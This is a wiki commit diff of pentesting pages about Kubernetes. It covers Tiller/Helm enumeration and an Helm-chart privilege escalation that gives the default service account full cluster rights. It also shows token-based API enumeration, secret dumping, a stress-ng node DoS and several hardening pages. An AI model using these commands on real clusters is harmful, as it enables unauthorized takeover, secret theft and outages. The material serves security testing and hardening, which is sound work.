
GitBook: [#2926] No subject

This commit is contained in:
CPol 2021-12-29 12:26:06 +00:00 committed by gitbook-bot
parent 0adb39ac43
commit 8b28167db2
11 changed files with 498 additions and 126 deletions

View file

@ -218,6 +218,9 @@
* [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
* [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
* [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
* [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
* [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
* [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md)
* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md)
* [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md)
@ -356,6 +359,7 @@
* [11211 - Pentesting Memcache](pentesting/11211-memcache.md)
* [15672 - Pentesting RabbitMQ Management](pentesting/15672-pentesting-rabbitmq-management.md)
* [27017,27018 - Pentesting MongoDB](pentesting/27017-27018-mongodb.md)
* [44134 - Pentesting Tiller (Helm)](pentesting/44134-pentesting-tiller-helm.md)
* [44818/UDP/TCP - Pentesting EthernetIP](pentesting/44818-ethernetip.md)
* [47808/udp - Pentesting BACNet](pentesting/47808-udp-bacnet.md)
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)

View file

@ -64,6 +64,29 @@ Then, you can **decompress** the image and **access the blobs** to search for su
tar -xf image.tar
```
### Basic Analysis
You can get **basic information** from the image by running:
```bash
docker inspect <image>
```
You can also get a summary **history of changes** with:
```bash
docker history --no-trunc <image>
```
You can also generate a **Dockerfile from an image** with:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers
```
### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) utility (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)):
```bash
# Hedged example, inspecting the image used above layer by layer
dive madhuakula/k8s-goat-hidden-in-layers
```
View file

@ -0,0 +1,67 @@
# 44134 - Pentesting Tiller (Helm)
## Basic Information
Helm is the **package manager** for Kubernetes. It allows you to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** that **runs by default on port 44134**.
**Default port:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
## Enumeration
If you can **enumerate pods and/or services** of different namespaces, enumerate them and search for the ones with **"tiller" in their name**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
Examples:
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
You could also check whether this service is running by scanning port 44134:
```bash
sudo nmap -sS -p 44134 <IP>
```
Once you have discovered it, you can communicate with it by downloading the **helm** client application. You can use tools like `homebrew`, or look at [**the official releases page**](https://github.com/helm/helm/releases). For more details, or for other options, see [the installation guide](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Then, you can **enumerate the service**:
```
helm --host tiller-deploy.kube-system:44134 version
```
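If it responds, you can also try to list the deployed releases (a hedged example using Helm v2 syntax):
```bash
helm --host tiller-deploy.kube-system:44134 ls --all
```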
### Privilege Escalation
By default **Helm2** was installed in the **kube-system namespace** with **high privileges**, so if you find the service and have access to it, this could allow you to **escalate privileges**.
All you need to do is install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn), which will give the **default service token access to everything in the whole cluster.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn/pwnchart
```
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.
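After installing the chart you can verify that the default service account has gained full privileges (a hedged check; the namespace of the token may differ in your cluster):
```bash
# The chart's ClusterRoleBinding grants the default SA cluster-wide privileges
kubectl auth can-i --list --as=system:serviceaccount:default:default
kubectl auth can-i '*' '*' --as=system:serviceaccount:default:default
```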

View file

@ -55,10 +55,6 @@ Another important details about enumeration and Kubernetes permissions abuse is
## Hardening Kubernetes
The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
You can choose to:
* run kube-bench from inside a container (sharing the PID namespace with the host),
* run a container that installs kube-bench on the host and then run kube-bench directly on the host,
* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases), or
* compile it from source.
{% content-ref url="kubernetes-hardening/" %}
[kubernetes-hardening](kubernetes-hardening/)
{% endcontent-ref %}

View file

@ -50,6 +50,8 @@ As you are inside the Kubernetes environment, if you cannot escalate privileges
kubectl get svc --all-namespaces
```
By default, Kubernetes uses a flat networking schema, which means **any pod/service within the cluster can talk to any other**. The **namespaces** within the cluster **don't have any network security restrictions by default**, so any pod in one namespace can talk to pods in other namespaces.
### Scanning
The following Bash script (taken from a [Kubernetes workshop](https://github.com/calinah/learn-by-hacking-kccn/blob/master/k8s\_cheatsheet.md)) will install a scanner and scan the IP ranges of the Kubernetes cluster:
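A minimal sketch of that approach (hedged; assumes a Debian-based pod and the common `10.96.0.0/12` service CIDR; adjust the ranges and ports to your cluster):
```bash
# Install a scanner inside the compromised pod (use apk on Alpine images)
apt-get update && apt-get install -y nmap
# Sweep a slice of the service range for common in-cluster ports
nmap -sT -Pn -p 22,53,80,443,2379,6443,8443,10250 10.96.0.0/24
```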
@ -83,6 +85,24 @@ Check out the following page to learn how you could **attack Kubernetes specific
In case the **compromised pod is running some sensitive service** where other pods need to authenticate, you might be able to obtain the credentials sent by the other pods.
### Node DoS
If no resources are specified in the Kubernetes manifests and **no limit ranges are applied** to the containers, an attacker can **consume all the resources of the node where the pod/deployment is running**, starve other workloads, and cause a DoS for the environment.
This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
```
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
```
You can see the difference in consumption while `stress-ng` is running and afterwards with:
```bash
kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
```
![Scenario 13 kubectl top](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-13-3.png)
## Node Post-Exploitation
If you managed to **escape from the container**, there are some interesting things you will find in the node:

View file

@ -96,12 +96,25 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicate just how to list the objects. If you want to access the data, you need to use `describe` instead of `get`.
{% endhint %}
### Using curl
From inside a pod you can use several environment variables to build an authenticated `curl` alias:
```bash
export APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
```
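For example, with the `kurl` alias you can query the API server directly (note that `$APISERVER` already includes the `https://` scheme):
```bash
kurl "$APISERVER/api/v1/namespaces/$NAMESPACE/pods/"
```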
### Using kubectl
Having the token and the address of the API server, you can use `kubectl` or `curl` to access it as indicated here:
```bash
alias kubectl='kubectl --token=<jwt_token> --server=https://host:port --insecure-skip-tls-verify=true'
alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true'
```
You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present, in an ordered manner, different options to enumerate and understand the K8s cluster you have obtained access to.
@ -144,8 +157,8 @@ With this info you will know all the services you can list
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl api-resources --namespaced=true #Resources specific to a namespace
./kubectl api-resources --namespaced=false #Resources NOT specific to a namespace
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
{% endtab %}
{% endtabs %}
@ -155,20 +168,20 @@ With this info you will know all the services you can list
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl auth can-i --list #Get privileges in general
./kubectl auth can-i --list -n custnamespace #Get privileges in custnamespace
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileges in custnamespace
# Get service account permissions
./kubectl auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
```
{% endtab %}
{% tab title="API" %}
```bash
curl -i -s -k -X $'POST' \
-H "Authorization: Bearer $TOKEN" -H $'Content-Type: application/json' \
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
{% endtab %}
{% endtabs %}
@ -192,14 +205,13 @@ Kubernetes supports **multiple virtual clusters** backed by the same physical cl
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get namespaces
k get namespaces
```
{% endtab %}
{% tab title="API" %}
```bash
curl -k -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/
kurl -k -v $APISERVER/api/v1/namespaces/
```
{% endtab %}
{% endtabs %}
@ -209,18 +221,16 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespace
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get secrets -o yaml
./kubectl get secrets -o yaml -n custnamespace
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/secrets/
kurl -v $APISERVER/api/v1/namespaces/default/secrets/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
kurl -v $APISERVER/api/v1/namespaces/custnamespace/secrets/
```
{% endtab %}
{% endtabs %}
@ -228,7 +238,7 @@ https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
If you can read secrets you can use the following lines to get the privileges related to each token:
```bash
for token in `./kubectl describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; ./kubectl --token $token auth can-i --list; echo; done
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```
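If a token grants interesting privileges, you can also dump and decode a specific secret (a hedged example; `<secret_name>` is a placeholder):
```bash
k get secret <secret_name> -n kube-system -o yaml
k get secret <secret_name> -n kube-system -o jsonpath='{.data.token}' | base64 -d
```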
### Get Service Accounts
@ -238,14 +248,13 @@ As discussed at the beginning of this page **when a pod is run a service account i
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get serviceaccounts
k get serviceaccounts
```
{% endtab %}
{% tab title="API" %}
```bash
curl -k -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/{namespace}/serviceaccounts
kurl -k -v $APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
```
{% endtab %}
{% endtabs %}
@ -257,15 +266,14 @@ The deployments specify the **components** that need to be **run**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get deployments
./kubectl get deployments -n custnamespace
k get deployments
k get deployments -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://<$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/<namespace>/deployments/
kurl -v $APISERVER/apis/apps/v1/namespaces/<namespace>/deployments/
```
{% endtab %}
{% endtabs %}
@ -277,15 +285,14 @@ The Pods are the actual **containers** that will **run**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get pods
./kubectl get pods -n custnamespace
k get pods
k get pods -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://<$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/namespaces/<namespace>/pods/
kurl -v $APISERVER/api/v1/namespaces/<namespace>/pods/
```
{% endtab %}
{% endtabs %}
@ -297,15 +304,14 @@ Kubernetes **services** are used to **expose a service in a specific port and IP
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get services
./kubectl get services -n custnamespace
k get services
k get services -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS>/api/v1/namespaces/default/services/
kurl -v $APISERVER/api/v1/namespaces/default/services/
```
{% endtab %}
{% endtabs %}
@ -317,14 +323,13 @@ Get all the **nodes configured inside the cluster**.
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get nodes
k get nodes
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/nodes/
kurl -v $APISERVER/api/v1/nodes/
```
{% endtab %}
{% endtabs %}
@ -336,14 +341,13 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api/v1/nodes/
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get daemonsets
k get daemonsets
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/extensions/v1beta1/namespaces/default/daemonsets
kurl -v $APISERVER/apis/apps/v1/namespaces/default/daemonsets
```
{% endtab %}
{% endtabs %}
@ -355,14 +359,13 @@ Cron jobs allow scheduling, using crontab-like syntax, the launch of a pod that
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get cronjobs
k get cronjobs
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer $TOKEN" \
https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
kurl -v $APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
```
{% endtab %}
{% endtabs %}
@ -372,7 +375,7 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl get all
k get all
```
{% endtab %}
{% endtabs %}
@ -382,7 +385,7 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl top pod --all-namespaces
k top pod --all-namespaces
```
{% endtab %}
{% endtabs %}

View file

@ -547,80 +547,6 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm)
## Kubernetes API Hardening
It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could abuse it and damage the environment in a lot of ways.\
It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least privilege**). And definitely **never allow anonymous requests**.
**Common Request process:**\
User or K8s ServiceAccount > Authentication > Authorization > Admission Control.
**Tips**:
* Close unused ports.
* Avoid anonymous access.
* NodeRestriction: no access from specific nodes to the API.
  * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
  * Basically, it prevents kubelets from adding/removing/updating labels with a `node-restriction.kubernetes.io/` prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
  * It also controls which of these labels and label prefixes kubelets may add/remove/update.
* Use labels to ensure secure workload isolation.
* Prevent specific pods from accessing the API server.
* Avoid exposing the ApiServer to the internet.
* Avoid unauthorized access with proper RBAC.
* Protect the ApiServer port with a firewall and IP whitelisting.
## SecurityContext Hardening
By default, the root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  volumes:
  - name: sec-ctx-vol
    emptyDir: {}
  containers:
  - name: sec-ctx-demo
    image: busybox
    command: [ "sh", "-c", "sleep 1h" ]
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false
    volumeMounts:
    - name: sec-ctx-vol
      mountPath: /data/demo
```
* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
## General Hardening
You should update your Kubernetes environment as frequently as necessary to have:
* Dependencies up to date.
* Bug and security patches.
[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): every 3 months there is a new minor release -- 1.20.3 = 1 (major).20 (minor).3 (patch).
**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
* Upgrade the Master Node components following this sequence:
* etcd (all instances).
* kube-apiserver (all control plane hosts).
* kube-controller-manager.
* kube-scheduler.
* cloud controller manager, if you use one.
* Upgrade the Worker Node components such as kube-proxy, kubelet.
## References
{% embed url="https://sickrov.github.io/" %}

View file

@ -0,0 +1,127 @@
# Kubernetes Hardening
## Tools
### Kube-bench
The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
You can choose to:
* run kube-bench from inside a container (sharing the PID namespace with the host),
* run a container that installs kube-bench on the host and then run kube-bench directly on the host,
* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases), or
* compile it from source.
### Kubeaudit
The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various security concerns.
Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
```
kubeaudit all
```
This tool also has the `autofix` command to **automatically fix detected issues**, as shown below.
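For example, to audit a manifest and then autofix it (a hedged example; `deployment.yaml` is a placeholder file):
```bash
kubeaudit all -f deployment.yaml
kubeaudit autofix -f deployment.yaml
```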
### **Popeye**
[**Popeye**](https://github.com/derailed/popeye) is a utility that scans a live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive _over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metrics-server, it reports potential resource over/under allocations and attempts to warn you should your cluster run out of capacity.
### **KICS**
[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications.
### Checkov
[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code.
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning.
### **Monitoring with Falco**
{% content-ref url="monitoring-with-falco.md" %}
[monitoring-with-falco.md](monitoring-with-falco.md)
{% endcontent-ref %}
## Tips
### Kubernetes API Hardening
It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could abuse it and damage the environment in a lot of ways.\
It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least privilege**). And definitely **never allow anonymous requests**.
**Common Request process:**\
User or K8s ServiceAccount > Authentication > Authorization > Admission Control.
**Tips**:
* Close unused ports.
* Avoid anonymous access.
* NodeRestriction: no access from specific nodes to the API.
  * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
  * Basically, it prevents kubelets from adding/removing/updating labels with a `node-restriction.kubernetes.io/` prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
  * It also controls which of these labels and label prefixes kubelets may add/remove/update.
* Use labels to ensure secure workload isolation.
* Prevent specific pods from accessing the API server.
* Avoid exposing the ApiServer to the internet.
* Avoid unauthorized access with proper RBAC.
* Protect the ApiServer port with a firewall and IP whitelisting (a sketch of some of these settings follows).
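A hedged sketch of a few of these settings as kube-apiserver flags (where you set them depends on how the control plane is deployed, e.g. a kubeadm static pod manifest):
```bash
kube-apiserver \
  --anonymous-auth=false \
  --enable-admission-plugins=NodeRestriction \
  --authorization-mode=Node,RBAC
```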
### SecurityContext Hardening
By default, the root user will be used when a Pod is started if no other user is specified. You can run your application inside a more secure context using a template similar to the following one:
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo
spec:
  securityContext:
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  volumes:
  - name: sec-ctx-vol
    emptyDir: {}
  containers:
  - name: sec-ctx-demo
    image: busybox
    command: [ "sh", "-c", "sleep 1h" ]
    securityContext:
      runAsNonRoot: true
      allowPrivilegeEscalation: false
    volumeMounts:
    - name: sec-ctx-vol
      mountPath: /data/demo
```
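You can apply the manifest and check the effective user inside the container (hedged; `security-context-demo.yaml` is whatever file you saved the template to):
```bash
kubectl apply -f security-context-demo.yaml
# Expect uid=1000 and gid=3000 from the spec above (fsGroup 2000 as supplemental group)
kubectl exec security-context-demo -- id
```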
* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/)
### Kubernetes NetworkPolicies
{% content-ref url="kubernetes-networkpolicies.md" %}
[kubernetes-networkpolicies.md](kubernetes-networkpolicies.md)
{% endcontent-ref %}
### General Hardening
You should update your Kubernetes environment as frequently as necessary to have:
* Dependencies up to date.
* Bug and security patches.
[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): every 3 months there is a new minor release -- 1.20.3 = 1 (major).20 (minor).3 (patch).
**The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):**
* Upgrade the Master Node components following this sequence:
* etcd (all instances).
* kube-apiserver (all control plane hosts).
* kube-controller-manager.
* kube-scheduler.
* cloud controller manager, if you use one.
* Upgrade the Worker Node components such as kube-proxy and kubelet (a kubeadm sketch is shown below).
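On a kubeadm-managed cluster that sequence looks roughly like this (a hedged sketch; versions and package names are placeholders that vary by distro):
```bash
# Control plane
kubeadm upgrade plan
kubeadm upgrade apply v1.20.3
# Each worker node, one at a time
kubectl drain <node> --ignore-daemonsets
apt-get install -y kubelet=1.20.3-00 kubectl=1.20.3-00
kubectl uncordon <node>
```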

View file

@ -0,0 +1,122 @@
# Kubernetes NetworkPolicies
**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html)
### Scenario Information
In this scenario you deploy a simple network security policy for Kubernetes resources to create security boundaries.
* To get started with this scenario, ensure you are using a networking solution which supports `NetworkPolicy`
### Scenario Solution
* The below scenario is from [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes)
If you want to control traffic flow at the IP address or port level (OSI layer 3 or 4), then you might consider using Kubernetes NetworkPolicies for particular applications in your cluster. NetworkPolicies are an application-centric construct which allow you to specify how a pod is allowed to communicate with various network "entities" (we use the word "entity" here to avoid overloading the more common terms such as "endpoints" and "services", which have specific Kubernetes connotations) over the network.
The entities that a Pod can communicate with are identified through a combination of the following 3 identifiers:
1. Other pods that are allowed (exception: a pod cannot block access to itself)
2. Namespaces that are allowed
3. IP blocks (exception: traffic to and from the node where a Pod is running is always allowed, regardless of the IP address of the Pod or the node)
When defining a pod- or namespace-based NetworkPolicy, you use a selector to specify what traffic is allowed to and from the Pod(s) that match the selector. Meanwhile, when IP-based NetworkPolicies are created, we define policies based on IP blocks (CIDR ranges).
* We will be creating a "DENY all traffic to an application" policy
> This NetworkPolicy will drop all traffic to pods of an application, selected using Pod Selectors.
Use Cases:
* It's very common: to start whitelisting traffic with Network Policies, you first need to blacklist all traffic using a policy like this one.
* You want to run a Pod and want to prevent any other Pods communicating with it.
* You temporarily want to isolate traffic to a Service from other Pods.
![Scenario 20 NSP](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-1.gif)
#### Example
* Run a nginx Pod with labels `app=web` and expose it at port 80
```bash
kubectl run --image=nginx web --labels app=web --expose --port 80
```
* Run a temporary Pod and make a request to `web` Service
```bash
kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh
```
```bash
wget -qO- http://web
# You will see the below output
# <!DOCTYPE html>
# <html>
# <head>
# ...
```
* It works! Now save the following manifest to `web-deny-all.yaml`, then apply it to the cluster
```yaml
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: web-deny-all
spec:
podSelector:
matchLabels:
app: web
ingress: []
```
```bash
kubectl apply -f web-deny-all.yaml
```
#### Try it out
* Run a test container again, and try to query `web`
```bash
kubectl run --rm -i -t --image=alpine test-$RANDOM -- sh
```
```bash
wget -qO- --timeout=2 http://web
# You will see the below output
# wget: download timed out
```
* Traffic is dropped
#### [Remarks](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html#remarks)
* In the manifest above, we target Pods with the `app=web` label to apply the policy to. This manifest is missing the `spec.ingress` field, therefore no traffic is allowed into the Pod.
* If you create another NetworkPolicy that gives some Pods access to this application directly or indirectly, this NetworkPolicy will be obsolete (see the sketch below).
* If there is at least one NetworkPolicy with a rule allowing the traffic, the traffic will be routed to the pod regardless of the policies blocking it.
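A hedged illustration of that behavior: applying a broader allow policy for the same pods re-opens the traffic despite `web-deny-all` (the policy name here is hypothetical):
```bash
cat <<'EOF' | kubectl apply -f -
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: web-allow-all
spec:
  podSelector:
    matchLabels:
      app: web
  ingress:
  - {}
EOF
```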
#### Cleanup
```bash
kubectl delete pod web
kubectl delete service web
kubectl delete networkpolicy web-deny-all
```
* More references and resources can be found at [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes)
### Cilium Editor - Network Policy Editor
A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts.
